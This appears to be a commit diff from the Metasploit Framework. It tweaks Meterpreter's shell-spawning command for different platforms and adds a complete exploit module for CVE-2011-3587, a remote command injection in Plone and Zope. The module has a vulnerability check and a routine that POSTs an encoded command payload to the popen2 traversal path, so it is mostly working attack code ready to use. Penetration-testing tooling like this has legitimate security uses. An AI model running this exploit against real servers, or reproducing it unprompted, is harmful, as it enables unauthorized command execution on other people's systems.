Merge branch 'master' of github.com:rapid7/metasploit-framework
commit
a2760b219d
|
@ -153,12 +153,21 @@ class Console::CommandDispatcher::Stdapi::Sys
|
||||||
# Drop into a system shell as specified by %COMSPEC% or
|
# Drop into a system shell as specified by %COMSPEC% or
|
||||||
# as appropriate for the host.
|
# as appropriate for the host.
|
||||||
def cmd_shell(*args)
|
def cmd_shell(*args)
|
||||||
if client.platform =~/win/
|
case client.platform
|
||||||
|
when /win/
|
||||||
path = client.fs.file.expand_path("%COMSPEC%")
|
path = client.fs.file.expand_path("%COMSPEC%")
|
||||||
path = (path and not path.empty?) ? path : "cmd.exe"
|
path = (path and not path.empty?) ? path : "cmd.exe"
|
||||||
cmd_execute("-f", path, "-c", "-H", "-i", "-t")
|
cmd_execute("-f", path, "-c", "-H", "-i", "-t")
|
||||||
|
when /linux/
|
||||||
|
# Don't expand_path() this because it's literal anyway
|
||||||
|
path = "/bin/sh"
|
||||||
|
cmd_execute("-f", path, "-c", "-i")
|
||||||
else
|
else
|
||||||
path = client.fs.file.expand_path("/bin/bash")
|
# Then this is a multi-platform meterpreter (php or java), which
|
||||||
|
# must special-case COMSPEC to return the system-specific shell.
|
||||||
|
path = client.fs.file.expand_path("%COMSPEC%")
|
||||||
|
# If that failed for whatever reason, guess it's unix
|
||||||
|
path = (path and not path.empty?) ? path : "/bin/sh"
|
||||||
cmd_execute("-f", path, "-c", "-i")
|
cmd_execute("-f", path, "-c", "-i")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -0,0 +1,93 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# Framework web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/framework/
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
def initialize(info={})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Plone and Zope Remote CMD Injection Exploit',
|
||||||
|
'Description' => %q{
|
||||||
|
Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x
|
||||||
|
through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute
|
||||||
|
arbitrary commands via vectors related to the p_ class in OFS/misc_.py and
|
||||||
|
the use of Python modules.
|
||||||
|
|
||||||
|
},
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Plone Security team', # Vulnerability discovery
|
||||||
|
'Nick Miles', # Original exploit
|
||||||
|
'TecR0c' # Metasploit module
|
||||||
|
],
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['CVE', '2011-3587'],
|
||||||
|
['URL', 'http://www.exploit-db.com/exploits/18262/'],
|
||||||
|
['URL', 'http://plone.org/products/plone/security/advisories/20110928']
|
||||||
|
],
|
||||||
|
'Privileged' => false,
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'Compat' =>
|
||||||
|
{
|
||||||
|
'PayloadType' => 'cmd',
|
||||||
|
'RequiredCmd' => 'generic telnet perl ruby',
|
||||||
|
}
|
||||||
|
},
|
||||||
|
'Platform' => ['unix', 'linux'],
|
||||||
|
'Arch' => ARCH_CMD,
|
||||||
|
'Targets' => [['Automatic',{}]],
|
||||||
|
'DisclosureDate' => 'Oct 04 2011',
|
||||||
|
'DefaultTarget' => 0
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RPORT(8080),
|
||||||
|
OptString.new('URI',[true, "The path to the Plone installation", "/"]),
|
||||||
|
],self.class)
|
||||||
|
register_autofilter_ports([ 8080 ])
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
uri = datastore['URI']
|
||||||
|
uri << '/' if uri[-1,1] != '/'
|
||||||
|
uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
|
||||||
|
|
||||||
|
res = send_request_raw(
|
||||||
|
{
|
||||||
|
'uri' => uri
|
||||||
|
}, 25)
|
||||||
|
if (res.headers['Bobo-Exception-Type'] =~ /zExceptions.BadRequest/)
|
||||||
|
return Exploit::CheckCode::Vulnerable
|
||||||
|
end
|
||||||
|
# patched == zExceptions.NotFound
|
||||||
|
return Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
uri = datastore['URI']
|
||||||
|
uri << '/' if uri[-1,1] != '/'
|
||||||
|
uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
|
||||||
|
|
||||||
|
send_request_cgi(
|
||||||
|
{
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => uri,
|
||||||
|
'vars_post' =>
|
||||||
|
{
|
||||||
|
'cmd' => payload.encoded,
|
||||||
|
}
|
||||||
|
}, 0.5) # short timeout, we don't care about the response
|
||||||
|
end
|
||||||
|
end
|
Loading…
Reference in New Issue